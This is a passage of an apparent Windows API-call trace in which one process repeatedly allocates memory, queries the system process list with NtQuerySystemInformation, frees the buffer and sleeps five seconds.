BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.057] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 